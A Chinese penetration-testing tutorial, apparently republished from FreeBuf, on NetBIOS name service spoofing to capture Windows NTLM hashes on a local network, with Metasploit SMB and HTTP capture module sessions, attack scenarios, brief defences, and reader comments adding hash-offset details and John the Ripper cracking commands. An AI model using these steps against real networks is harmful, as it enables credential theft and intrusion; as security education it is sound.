CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 漏洞列表
  3. 正文

netbios-ssn

2018年11月12日 719点热度 0人点赞 0条评论
  • FB招聘站
  • 分类阅读
  • 专栏
  • 公开课
  • FIT 2019
  • 企业服务
  • 用户服务
  • 搜索
  • 投稿
  • 登录
  • 注册

使用NetBios Spoofing技术渗透内网

thanks2012-08-07共452181人围观 ,发现 46 个不明物体WEB安全文章

Author:Thanks  
Site:http://www.freebuf.com 

一 前言

我们知道,在做内网渗透的时候,ARP欺骗、DNS欺骗等手法往往影响较大,且由于上述技术相对古老,防御软件多,加上现在很多的网络设备也逐渐拥有了ARP欺骗防御功能,所以种种情况无疑为我们的内网渗透增加了难度。 

最近我在渗透测试工作中用到NetBios Spoofing技术,这种技术对WIN系列XP, 2003, Vista, 7, 2008均有效,能不依赖于ARP Spoofing以较小的成本抓取系统Hash。

二 NetBIOS Name Service (NBNS) 描述

NETBIOS协议是一种在局域网上的程序可以使用的应用程序编程接口(API),为程序提供了请求低级服务的统一的命令集,作用是为了给局域网提供网络以及其他特殊功能,系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址,实现信息通讯,所以在局域网内部使用NetBIOS协议可以方便地实现消息通信及资源的共享。

Windows做DNS解析时有如下步骤:

1.local hosts file - C:\Windows\System32\drivers\etc\hosts
2.DNS
3.NBNS

那么当访问者输入一个不存在的域名,而LOCAL HOST FILE、DNS服务器均无法给出解析时,我们可爱又人性化的Windows就会发送NBNS请求进行查询。

使用NetBios Spoofing技术渗透内网

请仔细看看上图的抓包,你会发现最给力的是:NBNS请求它是一个广播包!
即任何人可以回复并重定向流量,而不依赖于ARP欺骗。这非常神奇…

使用NetBios Spoofing技术渗透内网

讲到现在大家一定思路清晰了:当下我们的目的是回复NBNS响应,从而转移流量进行欺骗。

三 利用方法

NetBios Spoofing利用方法目前来说有两种:HTTP和SMB。
我们先打开Metasploit,使用nbns_response模块,然后设置欺骗IP:

使用NetBios Spoofing技术渗透内网

SMB:

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /home/tm/johnsmb
JOHNPWFILE => /home/tm/johnsmb
msf auxiliary(smb) > show options 

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge 
   JOHNPWFILE  /home/tm/johnsmb  no        The prefix to the local filename to store the hashes in JOHN format
   LOGFILE                       no        The local filename to store the captured hashes
   SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

msf auxiliary(smb) > run
[*] Auxiliary module execution completed

[*] Server started.

HTTP:

msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > set LOGFILE /home/tm/httplog
LOGFILE => /home/tm/johnhttp
msf auxiliary(http_ntlm) > set URIPATH /
URIPATH => /
msf auxiliary(http_ntlm) > set SRVPORT 80
SRVPORT => 80

四 场景 

1.同交换环境下,有WINDOWS主机访问不存在的域名,如:http://thanks1132124324.com

使用NetBios Spoofing技术渗透内网

2.同交换环境下,有WINDOWS主机进行不存在的SMB通信,如:\\thanks1132124324

使用NetBios Spoofing技术渗透内网

如上图,通过以上两种方法我们均能获取被攻击者的HASH(测试机使用的是WIN7)。
而在获得HASH之后,诸如破解、HASH传递等进一步渗透的方法在此不再赘述。值得注意的是,高版本WINDOWS系统由于HASH存储机制的不同(NTLMv2),破解起来难度较大。

五 防御方法

1.使用高版本的WINDOWS系统,使用高强度的密码,以加大HASH破解难度
2.关闭TCP/IP Netbios功能

thanks

thanks70 篇文章等级: 8级
|
|
  • 上一篇:Iframe安全威胁
  • 下一篇:[翻译]如何渗透测试WordPress网站

这些评论亮了

  • thanks(8级)FreeBuf常务处主任回复
    @lion_00 msf nbns模块使用一个固定的chanllenge值(请留意option),所以依然可以爆破hash
    )10(亮了
  • 河蟹回复
    原文地址
    http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
    )6(亮了
发表评论

已有 45 条评论

  • shell 2012-08-07回复1楼

    这招不错!

    亮了(4)
  • phper 2012-08-07回复2楼

    NetBios这个服务网络共享要用到,大多数局域网应该都开着的吧。。

    亮了(4)
  • bryan 2012-08-07回复3楼

    默认是开的,在内网渗透是一种不错的攻击手法。

    亮了(3)
  • hellok 2012-08-07回复4楼

    围观+1

    亮了(1)
  • oyes 2012-08-07回复5楼

    为啥会带着hash呢。。这个ndns

    亮了(1)
    • kelz (7级)FreeBuf保安队队长 2012-08-07回复

      @oyes 在访问smb共享过程中,会发送LM&NT HASH到服务端进行认证,这个时候做嗅探或劫持对然后对获取到的数据包进行过滤之后就能得到LM&NT HASH值了。

      亮了(1)
      • OD 2012-08-07回复

        @kelz  用户随便输入什么都记录….觉得比较不好用

        亮了(1)
      • kelz (7级)FreeBuf保安队队长 2012-08-09回复

        @OD 所以数据包要做一些过滤之类的,包里去掉物理帧头、IP头和TCP头,再去掉4个字节的NETB头,剩下的就是SMB包的内容,再去掉33个字节长的SMB Reponse header,然后向后做28个字节的偏移,下面的24个字节的内容就是LM HASH,紧接着的24个字节就是NT HASH。详细可看这里http://www.xfocus.net/articles/200305/538.html

        亮了(2)
  • lion_00 2012-08-07回复6楼

    测试了一下,这个HASH好像是没有用的,每次都会变

    亮了(1)
    • thanks (8级)FreeBuf常务处主任 2012-08-08回复

      @lion_00 msf nbns模块使用一个固定的chanllenge值(请留意option),所以依然可以爆破hash

      亮了(10)
      • 坏虾 (1级) 2012-08-09回复

        不会弄,麻烦教教呗

        亮了(1)
      • 小菜 2012-08-17回复

        @thanks  每次变化的,也就是活不能使用HASH注入?

        亮了(1)
      • thanks (8级)FreeBuf常务处主任 2012-08-21回复

        @thanks  回头会再写一篇如何破解的:)

        亮了(1)
      • xxxxxxxx 2014-06-29回复

        @thanks  破解过程才是王道,这些大家应该都懂 就是破解不了。。

        亮了(1)
    • acmfly (1级) 2012-08-19回复

      @lion_00 的确会变

      亮了(1)
  • Mister诺诺 2012-08-07回复7楼

    这个要Mark!//: 其实ms08-068漏洞根本没有补上,微软没有意识到这个漏洞的本质是什么,这个漏洞本质是自动发送密码泄露了密码,中间人攻击只是利用的一种方式,并且中间人攻击的补丁也只是针对反射回服务器SMB这一种攻击方式。//: mark

    亮了(0)
  • Heee 2012-08-07回复8楼

    不错,可以看出作者对协议很熟悉~

    亮了(2)
  • 劉傑宏 2012-08-07回复9楼

    不知道为什么微软就不能将默认的NetBIOS禁止掉···

    亮了(0)
  • THANKS呵呵呵 2012-08-07回复10楼

    多谢关注

    亮了(0)
  • gogata (1级) 2012-08-07回复11楼

    学习了啊。。

    亮了(1)
  • houwenhui (1级)人生苦短,我用python。 2012-08-08回复12楼

    学习了,晚上尝试一下

    亮了(1)
  • Crow (3级)百度安全工程师 2012-08-08回复13楼

    不错 msf是个强大的东西 内部包含了很多的exp 还可以自己写

    亮了(1)
  • g0t3n (1级) 2012-08-08回复14楼

    很是强大….

    亮了(1)
  • 455968910 (1级) 2012-08-09回复15楼

    牛逼啊

    亮了(1)
  • Gall (4级) 2012-08-10回复16楼

    :grin: 大家来顶死他

    亮了(1)
  • 枕簟 (1级) 2012-08-10回复17楼

    随便看看。

    亮了(1)
  • init5 (3级)招商银行安全员 2012-08-17回复18楼

    灰常有营养

    亮了(4)
  • linxiaoxiao (1级) 2012-08-21回复19楼

    @thinks 去做了一下没有成功。欺骗的ip地址应该是安装msf的ip地址吧?

    亮了(2)
    • thanks (8级)FreeBuf常务处主任 2012-08-21回复

      @linxiaoxiao  是

      亮了(1)
  • 無情 (1级) 2012-08-28回复20楼

    netBios 早就被我关了。。 :mrgreen:

    亮了(1)
  • 有所坚持 (1级) 2012-08-28回复21楼

    今天看到试试,思路不错呀!谢谢!

    亮了(1)
  • dlan (3级)xx00 2012-09-12回复22楼

    auxiliary/server/capture/smb 本地伪造SMB SERVER服务器

    亮了(3)
  • 80445062 (1级) 2012-09-12回复23楼

    @Thanks 你抓到的hash解密成功过没有?
    只能抓到一半hash的,没办法解密的吧?

    亮了(1)
  • Hevar 2012-09-15回复24楼

    新的方法!学习学习!

    亮了(1)
  • xxghk (1级) 2012-10-21回复25楼

    仔细看了一下我们内部的网络发现netBios一直都是关闭的.没有测试

    亮了(1)
  • mark 2012-11-06回复26楼

    子墨阳,【使用NetBios Spoofing技术渗透内网】收藏成功。本文正文大约需要12分钟的阅读时间,请访问 稍后再读! 你可以关注 获得私信提醒。

    亮了(0)
  • Drizzle.Risk 2012-12-04回复27楼

    是不是必须开着wins服务?137?

    亮了(1)
  • 反恐小樱 (1级) 2013-02-23回复28楼

    我自己在虚拟机中测试,即便最简单的密码比如123456,捕获的HASH 根本没法破解

    亮了(2)
  • 河蟹 2013-09-29回复29楼

    原文地址
    http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html

    亮了(6)
  • malayke (3级) 2014-06-29回复30楼

    John the Ripper 破解 NTLM HASH 方法:
    john –format=netntlmv2 hashes.txt
    破解 LM 的 方法:
    john –format=lm hashes.txt

    亮了(1)
  • xxxxxxxx 2014-06-29回复31楼

    http://pen-testing.sans.org/blog/pen-testing/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python

    亮了(1)
  • ze0r 2014-06-29回复32楼

    为何HTTP访问会带着HASH?用WIRESHARK也没见抓到过HASH啊,为何?

    亮了(1)
    • baobao亲爱的 2015-06-11回复

      @ ze0r

      亮了(0)
    • baobao亲爱的 2015-06-11回复

      @ ze0r
      前面已经说过了,因为1和2 都不存在这个域名 就到了nbns这个协议上了。。
      Windows做DNS解析时有如下步骤:

      1.local hosts file – C:\Windows\System32\drivers\etc\hosts
      2.DNS
      3.NBNS

      亮了(0)
  • 18229872445 (1级) 2016-12-15回复33楼

    设置完毕后需要开启抓包软件吗?不然我这里没反应啊。

    亮了(0)

 

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

thanks

thanks

FreeBuf常务处主任

70文章数356评论数

最近文章

扒一扒国外那些有趣的安全创业公司(一)

2017.04.25

匡恩网络招聘安全人才

2016.09.11

追踪溯源:希拉里邮箱泄露事件

2016.08.22

浏览更多

相关阅读

  • 如何通过WIFI渗透企业内网?
  • 再探内网(域)渗透
  • 一个人的武林:内网渗透测试思路(二)
  • 浅谈内网渗透
  • 再谈内网渗透

特别推荐

关注我们 分享每日精选文章

活动预告

  • 11月

    FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气

    已结束
  • 10月

    【16课时-连载中】挖掘CVE不是梦(系列课程2)

    已结束
  • 10月

    【首节课仅需1元】挖掘CVE不是梦

    已结束
  • 9月

    【已结束】自炼神兵之自动化批量刷SRC

    已结束

FREEBUF

  • 免责声明
  • 协议条款
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2018年11月12日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me